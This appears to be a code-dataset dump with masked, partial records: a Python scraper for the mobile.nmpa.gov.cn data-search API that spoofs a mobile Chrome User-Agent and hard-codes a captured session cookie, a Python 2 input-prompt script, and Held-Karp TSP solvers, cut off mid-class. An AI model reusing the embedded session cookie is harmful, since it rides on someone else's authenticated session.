    """Fetch `url` via HTTP GET, impersonating mobile Chrome, and return the
    decoded response body as a string.

    The request carries a hard-coded session cookie; NOTE(review): this is
    presumably tied to a captured browser session and will stop working when
    that session expires -- confirm and refresh as needed.
    """
    print('Downloading ', url)
    # The first of the two original User-Agent assignments was dead code
    # (immediately overwritten); only the mobile-Chrome UA is kept.
    userAgent = 'Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Mobile Safari/537.36'
    acceptLanguage = 'zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7'
    acceptEncoding = 'gzip, deflate'
    accept = 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9'
    Cookie = 'JSESSIONID=A58B0B1DC96828832B92EE91D9E92605.7; tuNQaYE2WCOr80S=O43ziCfC7BLZm.F5edsUL84qX_T8DekwZhjFvL0AXMCYWDFH2_2qqyIQwdLwjfJb; tuNQaYE2WCOr80T=4zC94ZgkJ7NBDRsPXe.HrtFd3tXcvwudE41SSD4iUqL2TMsVQSF_QZ8LinHlNDmqOg_SeNEwr7NLRVyTJ7tG81Q310tSQQPTX0GJJDgefw7pPhWCn2BTVLKZ.MM_8iydxo1hNiKsmf7t9C5h3dn5b0DwZgfFZIzR1Ji4dsQdfhFkYTG5rdPQUPR5Y9.SG8jXjtXLxhv98Jx9DkyPYf2HWMJSWhjZlSe1sjjzACwcCozHaqBCvc_6F9mVCbKTdW44GKor91iD_VU2yaig6LwIHC5lVS0hSMTZQVlYPRJiQPf9AdA'
    # BUG FIX: the header key was written 'Accept - Language' (embedded
    # spaces), which is not a valid HTTP header field name; it is corrected
    # to 'Accept-Language'.
    http = urllib3.PoolManager(num_pools=5, headers={
        'User-Agent': userAgent,
        'Accept-Language': acceptLanguage,
        'Accept-Encoding': acceptEncoding,
        'Accept': accept,
        'Proxy-Connection': 'keep-alive',
        'Cache-Control': 'max-age=0',
        'Cookie': Cookie,
    })
    r = http.request('GET', url)
    print(r.status)
    html = r.data.decode()
    return html
if __name__ == '__main__':
    # Scrape the mobile.nmpa.gov.cn data-search API (tableId=25): page through
    # the list endpoint, then fetch one detail record per item ID.
    demoURL = 'http://mobile.nmpa.gov.cn/datasearch/QueryList?tableId=25&searchF=Quick%20SearchK&pageIndex=1&pageSize=1500'
    # The first demoDetailUrl (with a concrete ID, 109228) is a leftover
    # example; it is immediately overwritten by the template used below.
    demoDetailUrl = 'http://mobile.nmpa.gov.cn/datasearch/QueryRecord?tableId=25&searchF=ID&searchK=109228'
    demoDetailUrl = 'http://mobile.nmpa.gov.cn/datasearch/QueryRecord?tableId=25&searchF=ID&searchK='
    # Pages 1..9 only, 1500 records per page.
    for i in range(1,10):
        demoURL = 'http://mobile.nmpa.gov.cn/datasearch/QueryList?tableId=25&searchF=Quick%20SearchK&pageIndex='+str(i)+'&pageSize=1500'
        ss = download(demoURL)
        print(ss)
        data = json.loads(ss)
        for item in data:
            # searchK = item['COUNT']
            searchK = item['ID']
            print(item['CONTENT'])
            # Fetch the detail record for this ID.
            detailInfoJson = download(demoDetailUrl + str(searchK))
            detailInfo = json.loads(detailInfoJson)
            # Assemble a JSON object string from NAME/CONTENT pairs, skipping
            # the '注' (remarks) field. NOTE(review): values containing '"'
            # (or a record where every field is skipped) would make this
            # hand-built string invalid JSON and crash the loads below.
            detailJson = '{'
            for detail in detailInfo:
                if detail['NAME'] != '注':
                    detailJson = detailJson + '"' + detail['NAME'] + '":"' + detail['CONTENT'] + '",'
            detailJson = detailJson[:-1]
            detailJson = detailJson + '}'
            print(detailJson)
            detailData = json.loads(detailJson)
            # print(item['CONTENT'])
|
normal
|
{
"blob_id": "9d302ff2de8280bd8786794cdd533107d2a458bc",
"index": 5611,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef download(url):\n print('Downloading ', url)\n userAgent = (\n 'Mozilla/5.0 (Linux; U; Android 10; zh-cn; MI 9 Build/QKQ1.190825.002) AppleWebKit/533.1 (KHTML, like Gecko) Version/5.0 Mobile Safari/533.1'\n )\n userAgent = (\n 'Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Mobile Safari/537.36'\n )\n AcceptLanguage = 'zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7'\n AcceptEncoding = 'gzip, deflate'\n Accept = (\n 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9'\n )\n Cookie = (\n 'JSESSIONID=A58B0B1DC96828832B92EE91D9E92605.7; tuNQaYE2WCOr80S=O43ziCfC7BLZm.F5edsUL84qX_T8DekwZhjFvL0AXMCYWDFH2_2qqyIQwdLwjfJb; tuNQaYE2WCOr80T=4zC94ZgkJ7NBDRsPXe.HrtFd3tXcvwudE41SSD4iUqL2TMsVQSF_QZ8LinHlNDmqOg_SeNEwr7NLRVyTJ7tG81Q310tSQQPTX0GJJDgefw7pPhWCn2BTVLKZ.MM_8iydxo1hNiKsmf7t9C5h3dn5b0DwZgfFZIzR1Ji4dsQdfhFkYTG5rdPQUPR5Y9.SG8jXjtXLxhv98Jx9DkyPYf2HWMJSWhjZlSe1sjjzACwcCozHaqBCvc_6F9mVCbKTdW44GKor91iD_VU2yaig6LwIHC5lVS0hSMTZQVlYPRJiQPf9AdA'\n )\n http = urllib3.PoolManager(num_pools=5, headers={'User-Agent':\n userAgent, 'Accept - Language': AcceptLanguage, 'Accept-Encoding':\n AcceptEncoding, 'Accept': Accept, 'Proxy-Connection': 'keep-alive',\n 'Cache-Control': 'max-age=0', 'Cookie': Cookie})\n r = http.request('GET', url)\n print(r.status)\n html = r.data.decode()\n return html\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef download(url):\n print('Downloading ', url)\n userAgent = (\n 'Mozilla/5.0 (Linux; U; Android 10; zh-cn; MI 9 Build/QKQ1.190825.002) AppleWebKit/533.1 (KHTML, like Gecko) Version/5.0 Mobile Safari/533.1'\n )\n userAgent = (\n 'Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Mobile Safari/537.36'\n )\n AcceptLanguage = 'zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7'\n AcceptEncoding = 'gzip, deflate'\n Accept = (\n 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9'\n )\n Cookie = (\n 'JSESSIONID=A58B0B1DC96828832B92EE91D9E92605.7; tuNQaYE2WCOr80S=O43ziCfC7BLZm.F5edsUL84qX_T8DekwZhjFvL0AXMCYWDFH2_2qqyIQwdLwjfJb; tuNQaYE2WCOr80T=4zC94ZgkJ7NBDRsPXe.HrtFd3tXcvwudE41SSD4iUqL2TMsVQSF_QZ8LinHlNDmqOg_SeNEwr7NLRVyTJ7tG81Q310tSQQPTX0GJJDgefw7pPhWCn2BTVLKZ.MM_8iydxo1hNiKsmf7t9C5h3dn5b0DwZgfFZIzR1Ji4dsQdfhFkYTG5rdPQUPR5Y9.SG8jXjtXLxhv98Jx9DkyPYf2HWMJSWhjZlSe1sjjzACwcCozHaqBCvc_6F9mVCbKTdW44GKor91iD_VU2yaig6LwIHC5lVS0hSMTZQVlYPRJiQPf9AdA'\n )\n http = urllib3.PoolManager(num_pools=5, headers={'User-Agent':\n userAgent, 'Accept - Language': AcceptLanguage, 'Accept-Encoding':\n AcceptEncoding, 'Accept': Accept, 'Proxy-Connection': 'keep-alive',\n 'Cache-Control': 'max-age=0', 'Cookie': Cookie})\n r = http.request('GET', url)\n print(r.status)\n html = r.data.decode()\n return html\n\n\nif __name__ == '__main__':\n demoURL = (\n 'http://mobile.nmpa.gov.cn/datasearch/QueryList?tableId=25&searchF=Quick%20SearchK&pageIndex=1&pageSize=1500'\n )\n demoDetailUrl = (\n 'http://mobile.nmpa.gov.cn/datasearch/QueryRecord?tableId=25&searchF=ID&searchK=109228'\n )\n demoDetailUrl = (\n 'http://mobile.nmpa.gov.cn/datasearch/QueryRecord?tableId=25&searchF=ID&searchK='\n )\n for i in range(1, 10):\n demoURL = (\n 'http://mobile.nmpa.gov.cn/datasearch/QueryList?tableId=25&searchF=Quick%20SearchK&pageIndex='\n + str(i) + 
'&pageSize=1500')\n ss = download(demoURL)\n print(ss)\n data = json.loads(ss)\n for item in data:\n searchK = item['ID']\n print(item['CONTENT'])\n detailInfoJson = download(demoDetailUrl + str(searchK))\n detailInfo = json.loads(detailInfoJson)\n detailJson = '{'\n for detail in detailInfo:\n if detail['NAME'] != '注':\n detailJson = detailJson + '\"' + detail['NAME'\n ] + '\":\"' + detail['CONTENT'] + '\",'\n detailJson = detailJson[:-1]\n detailJson = detailJson + '}'\n print(detailJson)\n detailData = json.loads(detailJson)\n",
"step-4": "import urllib3\nimport json\n\n\ndef download(url):\n print('Downloading ', url)\n userAgent = (\n 'Mozilla/5.0 (Linux; U; Android 10; zh-cn; MI 9 Build/QKQ1.190825.002) AppleWebKit/533.1 (KHTML, like Gecko) Version/5.0 Mobile Safari/533.1'\n )\n userAgent = (\n 'Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Mobile Safari/537.36'\n )\n AcceptLanguage = 'zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7'\n AcceptEncoding = 'gzip, deflate'\n Accept = (\n 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9'\n )\n Cookie = (\n 'JSESSIONID=A58B0B1DC96828832B92EE91D9E92605.7; tuNQaYE2WCOr80S=O43ziCfC7BLZm.F5edsUL84qX_T8DekwZhjFvL0AXMCYWDFH2_2qqyIQwdLwjfJb; tuNQaYE2WCOr80T=4zC94ZgkJ7NBDRsPXe.HrtFd3tXcvwudE41SSD4iUqL2TMsVQSF_QZ8LinHlNDmqOg_SeNEwr7NLRVyTJ7tG81Q310tSQQPTX0GJJDgefw7pPhWCn2BTVLKZ.MM_8iydxo1hNiKsmf7t9C5h3dn5b0DwZgfFZIzR1Ji4dsQdfhFkYTG5rdPQUPR5Y9.SG8jXjtXLxhv98Jx9DkyPYf2HWMJSWhjZlSe1sjjzACwcCozHaqBCvc_6F9mVCbKTdW44GKor91iD_VU2yaig6LwIHC5lVS0hSMTZQVlYPRJiQPf9AdA'\n )\n http = urllib3.PoolManager(num_pools=5, headers={'User-Agent':\n userAgent, 'Accept - Language': AcceptLanguage, 'Accept-Encoding':\n AcceptEncoding, 'Accept': Accept, 'Proxy-Connection': 'keep-alive',\n 'Cache-Control': 'max-age=0', 'Cookie': Cookie})\n r = http.request('GET', url)\n print(r.status)\n html = r.data.decode()\n return html\n\n\nif __name__ == '__main__':\n demoURL = (\n 'http://mobile.nmpa.gov.cn/datasearch/QueryList?tableId=25&searchF=Quick%20SearchK&pageIndex=1&pageSize=1500'\n )\n demoDetailUrl = (\n 'http://mobile.nmpa.gov.cn/datasearch/QueryRecord?tableId=25&searchF=ID&searchK=109228'\n )\n demoDetailUrl = (\n 'http://mobile.nmpa.gov.cn/datasearch/QueryRecord?tableId=25&searchF=ID&searchK='\n )\n for i in range(1, 10):\n demoURL = (\n 'http://mobile.nmpa.gov.cn/datasearch/QueryList?tableId=25&searchF=Quick%20SearchK&pageIndex='\n + str(i) + 
'&pageSize=1500')\n ss = download(demoURL)\n print(ss)\n data = json.loads(ss)\n for item in data:\n searchK = item['ID']\n print(item['CONTENT'])\n detailInfoJson = download(demoDetailUrl + str(searchK))\n detailInfo = json.loads(detailInfoJson)\n detailJson = '{'\n for detail in detailInfo:\n if detail['NAME'] != '注':\n detailJson = detailJson + '\"' + detail['NAME'\n ] + '\":\"' + detail['CONTENT'] + '\",'\n detailJson = detailJson[:-1]\n detailJson = detailJson + '}'\n print(detailJson)\n detailData = json.loads(detailJson)\n",
"step-5": "import urllib3\nimport json\ndef download(url):\n print('Downloading ', url)\n userAgent = 'Mozilla/5.0 (Linux; U; Android 10; zh-cn; MI 9 Build/QKQ1.190825.002) AppleWebKit/533.1 (KHTML, like Gecko) Version/5.0 Mobile Safari/533.1'\n userAgent = 'Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Mobile Safari/537.36'\n AcceptLanguage ='zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7'\n AcceptEncoding= 'gzip, deflate'\n Accept = 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9'\n\n Cookie = 'JSESSIONID=A58B0B1DC96828832B92EE91D9E92605.7; tuNQaYE2WCOr80S=O43ziCfC7BLZm.F5edsUL84qX_T8DekwZhjFvL0AXMCYWDFH2_2qqyIQwdLwjfJb; tuNQaYE2WCOr80T=4zC94ZgkJ7NBDRsPXe.HrtFd3tXcvwudE41SSD4iUqL2TMsVQSF_QZ8LinHlNDmqOg_SeNEwr7NLRVyTJ7tG81Q310tSQQPTX0GJJDgefw7pPhWCn2BTVLKZ.MM_8iydxo1hNiKsmf7t9C5h3dn5b0DwZgfFZIzR1Ji4dsQdfhFkYTG5rdPQUPR5Y9.SG8jXjtXLxhv98Jx9DkyPYf2HWMJSWhjZlSe1sjjzACwcCozHaqBCvc_6F9mVCbKTdW44GKor91iD_VU2yaig6LwIHC5lVS0hSMTZQVlYPRJiQPf9AdA'\n\n http = urllib3.PoolManager(num_pools=5, headers={'User-Agent': userAgent,'Accept - Language': AcceptLanguage,\n 'Accept-Encoding': AcceptEncoding ,'Accept':Accept,\n 'Proxy-Connection': 'keep-alive',\n 'Cache-Control': 'max-age=0',\n 'Cookie':Cookie})\n r = http.request('GET', url)\n print(r.status)\n html = r.data.decode()\n return html\n\n\nif __name__ == '__main__':\n demoURL = 'http://mobile.nmpa.gov.cn/datasearch/QueryList?tableId=25&searchF=Quick%20SearchK&pageIndex=1&pageSize=1500'\n demoDetailUrl = 'http://mobile.nmpa.gov.cn/datasearch/QueryRecord?tableId=25&searchF=ID&searchK=109228'\n demoDetailUrl = 'http://mobile.nmpa.gov.cn/datasearch/QueryRecord?tableId=25&searchF=ID&searchK='\n\n for i in range(1,10):\n demoURL = 'http://mobile.nmpa.gov.cn/datasearch/QueryList?tableId=25&searchF=Quick%20SearchK&pageIndex='+str(i)+'&pageSize=1500'\n ss = download(demoURL)\n\n print(ss)\n data = 
json.loads(ss)\n for item in data:\n # searchK = item['COUNT']\n searchK = item['ID']\n print(item['CONTENT'])\n detailInfoJson = download(demoDetailUrl + str(searchK))\n detailInfo = json.loads(detailInfoJson)\n detailJson = '{'\n for detail in detailInfo:\n if detail['NAME'] != '注':\n detailJson = detailJson + '\"' + detail['NAME'] + '\":\"' + detail['CONTENT'] + '\",'\n detailJson = detailJson[:-1]\n detailJson = detailJson + '}'\n print(detailJson)\n detailData = json.loads(detailJson)\n # print(item['CONTENT'])\n\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
# Python 2 script (raw_input / print statement): prompt the user, in
# Indonesian, for their age, height and weight, then echo the answers back.
umur = raw_input("Berapakah umurmu?")
tinggi = raw_input("Berapakah tinggimu?")
berat = raw_input("Berapa beratmu?")
# %r repr()s each answer, so the echoed values appear quoted.
print "Jadi, umurmu adalah %r, tinggumu %r, dan beratmu %r." % (umur, tinggi, berat)
|
normal
|
{
"blob_id": "7d2335c956776fc5890a727d22540eabf2ea4b94",
"index": 5862,
"step-1": "umur = raw_input(\"Berapakah umurmu?\")\ntinggi = raw_input(\"Berapakah tinggimu?\")\nberat = raw_input(\"Berapa beratmu?\")\n\nprint \"Jadi, umurmu adalah %r, tinggumu %r, dan beratmu %r.\" % (umur, tinggi, berat)\n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
<|reserved_special_token_0|>
def held_karp_bottomup(distance_matrix):
    """
    In the bottom up implementation, we compute all possible solutions for the
    values `i` and `visited` as in the implementations above, and then
    simply look up the value for f(0,0).
    With this approach, we use the dp table, the original `distance_matrix`
    and knowledge of the optimal cost to work backwards in determining what
    the optimal path was.

    Returns a tuple (cost, path): `cost` is the optimal tour length and
    `path` is the tour as city indices starting and ending at city 0.
    NOTE: Python 2 code -- uses `xrange` and `sys.maxint`.
    """
    d = distance_matrix
    n = len(d)
    # dp[i][visited] = min cost to travel from city i back to city 0,
    # visiting every city whose bit is 0 in `visited` exactly once.
    dp = [[None for i in xrange(2 ** n)] for j in xrange(n)]
    # Base case: all cities visited -> only step left is returning to city 0.
    for i in xrange(n):
        dp[i][(1 << n) - 1] = d[i][0]
    # Fill from "most cities visited" down to "none": each entry depends only
    # on entries whose bitmask has strictly more bits set.
    for visited in reversed(xrange((1 << n) - 1)):
        for i in xrange(n):
            min_dist = sys.maxint
            for j in xrange(n):
                if not 1 << j & visited:
                    dist_j = d[i][j] + dp[j][visited | 1 << j]
                    if dist_j < min_dist:
                        min_dist = dist_j
            dp[i][visited] = min_dist
    # Optimal cost: start at city 0 with only city 0 marked visited.
    ans = dp[0][1]
    # Reconstruct the tour: at each step pick the successor j whose dp value
    # accounts exactly (within float tolerance) for the remaining cost.
    path = [0]
    i, visited = 0, 1
    cost_from_i = dp[i][visited]
    while visited != (1 << n) - 1:
        for j in xrange(n):
            if not visited & 1 << j:
                cost_from_j = dp[j][visited | 1 << j]
                if abs(cost_from_i - cost_from_j - d[i][j]) < 0.001:
                    path.append(j)
                    i, visited = j, visited | 1 << j
                    cost_from_i = cost_from_j
                    break
    path.append(0)
    return ans, path
class Vertex:
    """A point in the Euclidean plane, stored as float coordinates."""

    def __init__(self, x, y):
        # Normalise inputs (ints, numeric strings, ...) to float up front.
        self.x, self.y = float(x), float(y)
<|reserved_special_token_0|>
def adjacency_matrix(graph):
    """
    Construct the corresponding adjacency matrix from a list of vertices in a
    graph, assumed to be a complete graph.

    m[i][j] is the Euclidean distance between graph[i] and graph[j]; the
    matrix is symmetric with a zero diagonal.
    NOTE: Python 2 code -- uses `xrange`.
    """
    m = [[None for v in graph] for v in graph]
    for i in xrange(len(m)):
        for j in xrange(len(m[i])):
            m[i][j] = distance(graph[i], graph[j])
    return m
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def held_karp_recursive(distance_matrix):
    """
    Solution to TSP using the Bellman-Held-Karp Algorithm
    Given the adjacency matrix to a corresponding tsp problem, find the
    minimum cost Hamiltonian cycle through the graph, as well as the
    corresponding path

    Returns (cost, path) where `path` starts and ends at city 0.
    NOTE: Python 2 code (`xrange`, `sys.maxint`). This variant has no
    memoization, so overlapping subproblems are recomputed.
    """
    d = distance_matrix
    n = len(d)
    def f(i, visited, path_so_far):
        """
        Let f(i, visited, path_so_far) be the path of minimum distance from
        city i to city 0, that passes through all remaining unvisited cities in
        `visited`, where visited is a bitmask such that the bit in the jth
        position being 1 represents city j having been visited, and bit j
        being 0 represents city j having not been visited, and `path_so_far` is
        the current path of minimum distance from city 0 up to city i.
        Then the solution we want is f(0, 0, []), and the following recursive
        relation holds:
        f(i, visited) = min_{j in unvisited} ( d(i,j) + f(j, visited | (1<<j)) )
        NOTE: Must be careful not to mutate
        """
        # Base case: all cities visited -- close the tour by returning home.
        if visited == (1 << n) - 1:
            return d[i][0], path_so_far + [0]
        min_dist = sys.maxint
        for j in xrange(n):
            # Try every not-yet-visited city j as the next stop.
            if not 1 << j & visited:
                dist_from_j, path_with_j = f(j, visited | 1 << j,
                    path_so_far + [j])
                dist_with_j = d[i][j] + dist_from_j
                if dist_with_j < min_dist:
                    min_dist = dist_with_j
                    min_path = path_with_j
        return min_dist, min_path
    return f(0, 0, [])
def held_karp_topdown(distance_matrix):
    """
    Above algorithm, but making use of memoization to avoid recomputing
    overlapping subproblems

    Returns (cost, path) where `path` starts and ends at city 0.
    NOTE: Python 2 code (`xrange`, `sys.maxint`).
    """
    d = distance_matrix
    n = len(d)
    """
    We need a dp table that will store the minimum distances from city i
    to city 0 that passes through all unvisitied cities in the bit mask.
    There are n cities, and 2^n possible binary strings of length n, so our
    table will have dimensions n x 2^n
    With this approach, we use another table called 'child' that keeps track
    of the child city of i for each combination of (i, visited), and we can
    use this table to obtain the actual Hamiltonian cycle of minimum distance.
    """
    dp = [[None for i in xrange(2 ** n)] for j in xrange(n)]
    child = [[None for i in xrange(2 ** n)] for j in xrange(n)]
    def f(i, visited):
        """
        f is defined as in the purely recursive implementation above.
        The only difference here is that we check if the value we are
        looking for is already in the defined dp table, and we do not
        keep track of the path as we go along, as looking up a solution
        for any given value would require having stored the path for
        that solution as well, which would be expensive.
        As such, we use the `child` table to keep track of where we
        came from.
        """
        # NOTE(review): truthiness test means a cached value of exactly 0
        # would be recomputed; benign for positive distances, but
        # `is not None` would be stricter.
        if dp[i][visited]:
            return dp[i][visited]
        if visited == (1 << n) - 1:
            # All cities seen: cost is the direct hop back to city 0.
            dp[i][visited] = d[i][0]
            child[i][visited] = 0
            return d[i][0]
        min_dist = sys.maxint
        chosen_j = None
        for j in xrange(n):
            if not 1 << j & visited:
                dist_with_j = d[i][j] + f(j, 1 << j | visited)
                if dist_with_j < min_dist:
                    min_dist = dist_with_j
                    chosen_j = j
        dp[i][visited] = min_dist
        # Record which successor achieved the minimum so the optimal tour
        # can be rebuilt afterwards.
        child[i][visited] = chosen_j
        return min_dist
    ans = f(0, 1)
    # Walk the `child` chain from the start state to recover the tour; the
    # chain ends at a state whose successor was never recorded (None).
    path = [0]
    i, visited = 0, 1
    next_ = child[i][visited]
    while next_ is not None:
        path.append(next_)
        visited |= 1 << next_
        next_ = child[next_][visited]
    return ans, path
def held_karp_bottomup(distance_matrix):
    """
    In the bottom up implementation, we compute all possible solutions for the
    values `i` and `visited` as in the implementations above, and then
    simply look up the value for f(0,0).
    With this approach, we use the dp table, the original `distance_matrix`
    and knowledge of the optimal cost to work backwards in determining what
    the optimal path was.

    Returns a tuple (cost, path): `cost` is the optimal tour length and
    `path` is the tour as city indices starting and ending at city 0.
    NOTE: Python 2 code -- uses `xrange` and `sys.maxint`.
    """
    d = distance_matrix
    n = len(d)
    # dp[i][visited] = min cost to travel from city i back to city 0,
    # visiting every city whose bit is 0 in `visited` exactly once.
    dp = [[None for i in xrange(2 ** n)] for j in xrange(n)]
    # Base case: all cities visited -> only step left is returning to city 0.
    for i in xrange(n):
        dp[i][(1 << n) - 1] = d[i][0]
    # Fill from "most cities visited" down to "none": each entry depends only
    # on entries whose bitmask has strictly more bits set.
    for visited in reversed(xrange((1 << n) - 1)):
        for i in xrange(n):
            min_dist = sys.maxint
            for j in xrange(n):
                if not 1 << j & visited:
                    dist_j = d[i][j] + dp[j][visited | 1 << j]
                    if dist_j < min_dist:
                        min_dist = dist_j
            dp[i][visited] = min_dist
    # Optimal cost: start at city 0 with only city 0 marked visited.
    ans = dp[0][1]
    # Reconstruct the tour: at each step pick the successor j whose dp value
    # accounts exactly (within float tolerance) for the remaining cost.
    path = [0]
    i, visited = 0, 1
    cost_from_i = dp[i][visited]
    while visited != (1 << n) - 1:
        for j in xrange(n):
            if not visited & 1 << j:
                cost_from_j = dp[j][visited | 1 << j]
                if abs(cost_from_i - cost_from_j - d[i][j]) < 0.001:
                    path.append(j)
                    i, visited = j, visited | 1 << j
                    cost_from_i = cost_from_j
                    break
    path.append(0)
    return ans, path
class Vertex:
    """A point in the Euclidean plane, stored as float coordinates."""

    def __init__(self, x, y):
        # Normalise inputs (ints, numeric strings, ...) to float up front.
        self.x, self.y = float(x), float(y)
def distance(v1, v2):
    """Return the straight-line (Euclidean) distance between two points."""
    dx = v1.x - v2.x
    dy = v1.y - v2.y
    return (dx ** 2 + dy ** 2) ** 0.5
def adjacency_matrix(graph):
    """
    Construct the corresponding adjacency matrix from a list of vertices in a
    graph, assumed to be a complete graph.

    m[i][j] is the Euclidean distance between graph[i] and graph[j]; the
    matrix is symmetric with a zero diagonal.
    NOTE: Python 2 code -- uses `xrange`.
    """
    m = [[None for v in graph] for v in graph]
    for i in xrange(len(m)):
        for j in xrange(len(m[i])):
            m[i][j] = distance(graph[i], graph[j])
    return m
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def held_karp_recursive(distance_matrix):
    """
    Solution to TSP using the Bellman-Held-Karp Algorithm
    Given the adjacency matrix to a corresponding tsp problem, find the
    minimum cost Hamiltonian cycle through the graph, as well as the
    corresponding path

    Returns (cost, path) where `path` starts and ends at city 0.
    NOTE: Python 2 code (`xrange`, `sys.maxint`). This variant has no
    memoization, so overlapping subproblems are recomputed.
    """
    d = distance_matrix
    n = len(d)
    def f(i, visited, path_so_far):
        """
        Let f(i, visited, path_so_far) be the path of minimum distance from
        city i to city 0, that passes through all remaining unvisited cities in
        `visited`, where visited is a bitmask such that the bit in the jth
        position being 1 represents city j having been visited, and bit j
        being 0 represents city j having not been visited, and `path_so_far` is
        the current path of minimum distance from city 0 up to city i.
        Then the solution we want is f(0, 0, []), and the following recursive
        relation holds:
        f(i, visited) = min_{j in unvisited} ( d(i,j) + f(j, visited | (1<<j)) )
        NOTE: Must be careful not to mutate
        """
        # Base case: all cities visited -- close the tour by returning home.
        if visited == (1 << n) - 1:
            return d[i][0], path_so_far + [0]
        min_dist = sys.maxint
        for j in xrange(n):
            # Try every not-yet-visited city j as the next stop.
            if not 1 << j & visited:
                dist_from_j, path_with_j = f(j, visited | 1 << j,
                    path_so_far + [j])
                dist_with_j = d[i][j] + dist_from_j
                if dist_with_j < min_dist:
                    min_dist = dist_with_j
                    min_path = path_with_j
        return min_dist, min_path
    return f(0, 0, [])
def held_karp_topdown(distance_matrix):
    """
    Above algorithm, but making use of memoization to avoid recomputing
    overlapping subproblems

    Returns (cost, path) where `path` starts and ends at city 0.
    NOTE: Python 2 code (`xrange`, `sys.maxint`).
    """
    d = distance_matrix
    n = len(d)
    """
    We need a dp table that will store the minimum distances from city i
    to city 0 that passes through all unvisitied cities in the bit mask.
    There are n cities, and 2^n possible binary strings of length n, so our
    table will have dimensions n x 2^n
    With this approach, we use another table called 'child' that keeps track
    of the child city of i for each combination of (i, visited), and we can
    use this table to obtain the actual Hamiltonian cycle of minimum distance.
    """
    dp = [[None for i in xrange(2 ** n)] for j in xrange(n)]
    child = [[None for i in xrange(2 ** n)] for j in xrange(n)]
    def f(i, visited):
        """
        f is defined as in the purely recursive implementation above.
        The only difference here is that we check if the value we are
        looking for is already in the defined dp table, and we do not
        keep track of the path as we go along, as looking up a solution
        for any given value would require having stored the path for
        that solution as well, which would be expensive.
        As such, we use the `child` table to keep track of where we
        came from.
        """
        # NOTE(review): truthiness test means a cached value of exactly 0
        # would be recomputed; benign for positive distances, but
        # `is not None` would be stricter.
        if dp[i][visited]:
            return dp[i][visited]
        if visited == (1 << n) - 1:
            # All cities seen: cost is the direct hop back to city 0.
            dp[i][visited] = d[i][0]
            child[i][visited] = 0
            return d[i][0]
        min_dist = sys.maxint
        chosen_j = None
        for j in xrange(n):
            if not 1 << j & visited:
                dist_with_j = d[i][j] + f(j, 1 << j | visited)
                if dist_with_j < min_dist:
                    min_dist = dist_with_j
                    chosen_j = j
        dp[i][visited] = min_dist
        # Record which successor achieved the minimum so the optimal tour
        # can be rebuilt afterwards.
        child[i][visited] = chosen_j
        return min_dist
    ans = f(0, 1)
    # Walk the `child` chain from the start state to recover the tour; the
    # chain ends at a state whose successor was never recorded (None).
    path = [0]
    i, visited = 0, 1
    next_ = child[i][visited]
    while next_ is not None:
        path.append(next_)
        visited |= 1 << next_
        next_ = child[next_][visited]
    return ans, path
def held_karp_bottomup(distance_matrix):
    """
    In the bottom up implementation, we compute all possible solutions for the
    values `i` and `visited` as in the implementations above, and then
    simply look up the value for f(0,0).
    With this approach, we use the dp table, the original `distance_matrix`
    and knowledge of the optimal cost to work backwards in determining what
    the optimal path was.

    Returns a tuple (cost, path): `cost` is the optimal tour length and
    `path` is the tour as city indices starting and ending at city 0.
    NOTE: Python 2 code -- uses `xrange` and `sys.maxint`.
    """
    d = distance_matrix
    n = len(d)
    # dp[i][visited] = min cost to travel from city i back to city 0,
    # visiting every city whose bit is 0 in `visited` exactly once.
    dp = [[None for i in xrange(2 ** n)] for j in xrange(n)]
    # Base case: all cities visited -> only step left is returning to city 0.
    for i in xrange(n):
        dp[i][(1 << n) - 1] = d[i][0]
    # Fill from "most cities visited" down to "none": each entry depends only
    # on entries whose bitmask has strictly more bits set.
    for visited in reversed(xrange((1 << n) - 1)):
        for i in xrange(n):
            min_dist = sys.maxint
            for j in xrange(n):
                if not 1 << j & visited:
                    dist_j = d[i][j] + dp[j][visited | 1 << j]
                    if dist_j < min_dist:
                        min_dist = dist_j
            dp[i][visited] = min_dist
    # Optimal cost: start at city 0 with only city 0 marked visited.
    ans = dp[0][1]
    # Reconstruct the tour: at each step pick the successor j whose dp value
    # accounts exactly (within float tolerance) for the remaining cost.
    path = [0]
    i, visited = 0, 1
    cost_from_i = dp[i][visited]
    while visited != (1 << n) - 1:
        for j in xrange(n):
            if not visited & 1 << j:
                cost_from_j = dp[j][visited | 1 << j]
                if abs(cost_from_i - cost_from_j - d[i][j]) < 0.001:
                    path.append(j)
                    i, visited = j, visited | 1 << j
                    cost_from_i = cost_from_j
                    break
    path.append(0)
    return ans, path
class Vertex:
    """A point in the Euclidean plane, stored as float coordinates."""

